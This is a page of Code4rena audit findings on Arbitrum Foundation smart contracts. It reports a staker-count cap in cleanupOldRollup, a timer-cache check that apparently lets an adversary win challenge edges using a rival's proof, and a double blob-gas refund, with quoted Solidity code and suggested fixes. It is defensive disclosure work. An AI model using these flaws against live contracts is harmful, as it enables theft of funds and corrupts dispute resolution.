        require(!validatorWhitelistDisabled, "WHITELIST_DISABLED");
        require(_chainIdChanged(), "CHAIN_ID_NOT_CHANGED");
        validatorWhitelistDisabled = true;
    }

    /**
     * @notice Remove the whitelist after the validator has been inactive for too long
     */
    function removeWhitelistAfterValidatorAfk() external {
+       // unpause checks
+       _requirePauseChecks();
        require(!validatorWhitelistDisabled, "WHITELIST_DISABLED");
        require(_validatorIsAfk(), "VALIDATOR_NOT_AFK");
        validatorWhitelistDisabled = true;
    }
    //...

Assessed type

Invalid Validation

Agreements & Disclosures

Agreements

If you are a C4 Certified Contributor by commenting or interacting with this repo prior to public release of the contest report, you agree that you have read the Certified Warden docs and agree to be bound by:

To signal your agreement to these terms, add a 👍 emoji to this issue.

Code4rena staff reserves the right to disqualify anyone from this role and similar future opportunities who is unable to participate within the above guidelines.

Disclosures

Sponsors may elect to add team members and contractors to assist in sponsor review and triage. All sponsor representatives added to the repo should comment on this issue to identify themselves.

To ensure contest integrity, the following potential conflicts of interest should also be disclosed with a comment in this issue:

  1. any sponsor staff or sponsor contractors who are also participating as wardens
  2. any wardens hired to assist with sponsor review (and thus presenting sponsor viewpoint on findings)
  3. any wardens who have a relationship with a judge that would typically fall in the category of potential conflict of interest (family, employer, business partner, etc)
  4. any other case where someone might reasonably infer a possible conflict of interest.

Some Stakers Will Be Missed Out During cleanupOldRollup() call

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L347-L349

Vulnerability details

Impact

The StakerCount variable take hold of the count of stakers in an instance, The Natspec comfirms that the stakerCount is not expected to be > 50, but this is not implemented in the code and there didn't seem to be restriction for that. This means there is a chance of the count to be more than 50.

The stakeCount is a list of stakers that stake in an instance and is of RollUpCore.sol func.

What can go wrong here? well, during the cleanupOldRollup function call, the stakerCount has been set to 50 if its > 50, remember, this is just for the loop not to be arbitrary and lead to out-Of gas issue or something unexpected.

The problem here is that the count has now been lost to only 50 whenever there's > 50 stakerCount, this is problematic as the number has been lost forever and this also means that some staker will be missed out when a call is made to cleanupOldRollup() function, potentially leaving them behind without being touched

Proof of Concept

/// @dev    Refund the existing stakers, pause and upgrade the current rollup to
    ///         allow them to withdraw after pausing
    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
>            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);
    }

Tools Used

Manual Review

Recommended Mitigation Steps

I recommend putting the restriction in place to make sure there's not more than 50 stakers in an instance, this will ensure that no staker is left behind during the function call.

The createNewStake function should be adjusted to something like:

function createNewStake(address stakerAddress, uint256 depositAmount, address withdrawalAddress) internal {
        uint64 stakerIndex = uint64(_stakerList.length);
@        if (stakerIndex <= 50){
            _stakerList.push(stakerAddress);
            _stakerMap[stakerAddress] = Staker(depositAmount, _latestConfirmed, stakerIndex, true, withdrawalAddress);
        }
        emit UserStakeUpdated(stakerAddress, withdrawalAddress, 0, depositAmount);
    }

This adjustment will ensure the stakers to be included in the cleanupOldRollup() function call without leaving any behind.

Assessed type

Loop

Adversary can update his timerCache with his rival's(i.e. honest party's) timer, and maliciously win assertions

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L528
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L698-L700

Vulnerability details

Impact

Adversary will have his edge confirmed, even though he wasn't able to prove his single step edge.

Proof of Concept

updateTimerCacheByClaim only checks that the mutualId of edgeId==originId of claimingEdge.
Since mutualId of two rivals are equal, adversary can updateTimerCacheByClaim, entering the claiming (or one step proved) edge of his rival:

updateTimerCacheByClaim function:

function updateTimerCacheByClaim(
    EdgeStore storage store,
    bytes32 edgeId,
    bytes32 claimingEdgeId,
    uint8 numBigStepLevel
) internal returns (bool, uint256) {
    // calculate the time unrivaled without inheritance
    uint256 totalTimeUnrivaled = timeUnrivaled(store, edgeId);
@>  checkClaimIdLink(store, edgeId, claimingEdgeId, numBigStepLevel); //@audit-issue I can update my timerCache with my rival's claim timer
    totalTimeUnrivaled += store.edges[claimingEdgeId].totalTimeUnrivaledCache; 
    return updateTimerCache(store, edgeId, totalTimeUnrivaled);
}

checkClaimIdLink function:

    function checkClaimIdLink(
        EdgeStore storage store,
        bytes32 edgeId,
        bytes32 claimingEdgeId,
        uint8 numBigStepLevel
    ) private view {
@>      if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(
                store.edges[edgeId].mutualId(),
                store.edges[claimingEdgeId].originId
            );
        }
        // the claiming edge must be exactly one level below
        if (
            nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) !=
            store.edges[claimingEdgeId].level
        ) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

If an adversary cannot prove his edge, but an honest party has, he would update his timerCache with the honest party's. This will allow him to confirm his edge.

Tools Used

Manual Review

Recommended Mitigation Steps

Within the ChallengeEdge struct, there should be a parameter that does not change across levels and bisections of an edge.
In the current implementation, claimId is set to 0 when bisecting an edge. This is why we can't use it as the "parameter" we are looking for.
I suggest having a parameter ,let's say uniqueID(I'm short of names) within the challenge Edge struct.
This "uniqueID" should be set to claimId of the block edge being created.
The difference between ChallengeEdge.claimId and ChallengeEdge.uniqueId is that while the former is set to 0 during edge bisection, the latter will not change.

Now, within checkClaimIdLink function, also check that :

    function checkClaimIdLink(
        EdgeStore storage store,
        bytes32 edgeId,
        bytes32 claimingEdgeId,
        uint8 numBigStepLevel
    ) private view {
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(
                store.edges[edgeId].mutualId(),
                store.edges[claimingEdgeId].originId
            );
        }
@>      if (store.edges[edgeId].uniqueId != store .edges[claimingEdgeId].uniqueId){
            revert("UniqueId must match");
        }
        // the claiming edge must be exactly one level below
        if (
            nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) !=
            store.edges[claimingEdgeId].level
        ) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

Assessed type

Context

the blobGas is been refunded twice in `addSequencerL2BatchFromBlobs` functions

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/bridge/SequencerInbox.sol#L508

Vulnerability details

The sequencer contract is been refunding the BatchPoster for gas used calling the function addSequencerL2BatchFromBlobs see the refundsGas modifier:

 modifier refundsGas(IGasRefunder gasRefunder, IReader4844 reader4844) {
        uint256 startGasLeft = gasleft(); 
        _;
        if (address(gasRefunder) != address(0)) {
            uint256 calldataSize = msg.data.length;
            uint256 calldataWords = (calldataSize + 31) / 32;
            // account for the CALLDATACOPY cost of the proxy contract, including the memory expansion cost
            startGasLeft += calldataWords * 6 + (calldataWords**2) / 512; 
           
            if (msg.sender != tx.origin) { 
                
            } else {
                
                if (address(reader4844) != address(0)) {
                   
                    try reader4844.getDataHashes() returns (bytes32[] memory dataHashes) {  <-----
                        if (dataHashes.length != 0) {
                            uint256 blobBasefee = reader4844.getBlobBaseFee();
                            startGasLeft +=
                                (dataHashes.length * gasPerBlob * blobBasefee) /
                                block.basefee;
                        }
                    } catch {} 
                }
            }

            gasRefunder.onGasSpent(payable(msg.sender), startGasLeft - gasleft(), calldataSize);
        }
    }

if the reader4844 is set it, the modifier is refunding the blob gas too see the arrow above.

The problem is that the blob gas fee is been refunded in the addSequencerL2BatchFromBlobsImpl function:

 function addSequencerL2BatchFromBlobs(
        uint256 sequenceNumber,
        uint256 afterDelayedMessagesRead,
        IGasRefunder gasRefunder,
        uint256 prevMessageCount,
        uint256 newMessageCount
    ) external refundsGas(gasRefunder, reader4844) {
        if (!isBatchPoster[msg.sender]) revert NotBatchPoster();
        if (isDelayProofRequired(afterDelayedMessagesRead)) revert DelayProofRequired();

        addSequencerL2BatchFromBlobsImpl(
            sequenceNumber,
            afterDelayedMessagesRead,
            prevMessageCount,
            newMessageCount
        );  <------
    }

[Link]

Impact

the blobGas is been refunded twice in addSequencerL2BatchFromBlobs functions making the protocol loss funds.

Proof of Concept

The BatchPoster is been refunded first in addSequencerL2BatchFromBlobsImpl function (see arrow below):

 function addSequencerL2BatchFromBlobsImpl(
        uint256 sequenceNumber,
        uint256 afterDelayedMessagesRead,
        uint256 prevMessageCount,
        uint256 newMessageCount
    ) internal {
        (
            bytes32 dataHash,
            IBridge.TimeBounds memory timeBounds,
            uint256 blobGas
        ) = formBlobDataHash(afterDelayedMessagesRead);

      
        (
            uint256 seqMessageIndex,
            bytes32 beforeAcc,
            bytes32 delayedAcc,
            bytes32 afterAcc
        ) = addSequencerL2BatchImpl(
                dataHash,
                afterDelayedMessagesRead,
                0,
                prevMessageCount,
                newMessageCount
            );

 
        if (seqMessageIndex != sequenceNumber && sequenceNumber != ~uint256(0)) {
            revert BadSequencerNumber(seqMessageIndex, sequenceNumber);
        }

        emit SequencerBatchDelivered(
            sequenceNumber,
            beforeAcc,
            afterAcc,
            delayedAcc,
            totalDelayedMessagesRead,
            timeBounds,
            IBridge.BatchDataLocation.Blob
        );

        
        if (hostChainIsArbitrum) revert DataBlobsNotSupported();

      
        if (msg.sender == tx.origin && !isUsingFeeToken) {
            submitBatchSpendingReport(dataHash, seqMessageIndex, block.basefee, blobGas); <-----
        }
    }

[Link]

And second in refundsGas modifier (see the arrow below):

 modifier refundsGas(IGasRefunder gasRefunder, IReader4844 reader4844) {
        uint256 startGasLeft = gasleft(); 
        _;
        if (address(gasRefunder) != address(0)) {
            uint256 calldataSize = msg.data.length;
            uint256 calldataWords = (calldataSize + 31) / 32;
            // account for the CALLDATACOPY cost of the proxy contract, including the memory expansion cost
            startGasLeft += calldataWords * 6 + (calldataWords**2) / 512; 
            // if triggered in a contract call, the spender may be overrefunded by appending dummy data to the call
            // so we check if it is a top level call, which would mean the sender paid calldata as part of tx.input
            // solhint-disable-next-line avoid-tx-origin
            if (msg.sender != tx.origin) { 
                // We can't be sure if this calldata came from the top level tx,
                // so to be safe we tell the gas refunder there was no calldata.
                calldataSize = 0;
            } else {
                // for similar reasons to above we only refund blob gas when the tx.origin is the msg.sender
                // this avoids the caller being able to send blobs to other contracts and still get refunded here
                if (address(reader4844) != address(0)) {
                    // add any cost for 4844 data, the data hash reader throws an error prior to 4844 being activated
                    // we do this addition here rather in the GasRefunder so that we can check the msg.sender is the tx.origin
                    try reader4844.getDataHashes() returns (bytes32[] memory dataHashes) {  <-----
                        if (dataHashes.length != 0) {
                            uint256 blobBasefee = reader4844.getBlobBaseFee();
                            startGasLeft +=
                                (dataHashes.length * gasPerBlob * blobBasefee) /
                                block.basefee;
                        }
                    } catch {} 
                }
            }

            gasRefunder.onGasSpent(payable(msg.sender), startGasLeft - gasleft(), calldataSize);
        }
    }

Tools Used

Manual.

Recommended Mitigation Steps

Consider don't refund the BatchPoster in the addSequencerL2BatchFromBlobsImpl function since the blob gas is been refunding in the refundsGas modifier.

Assessed type

Other

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.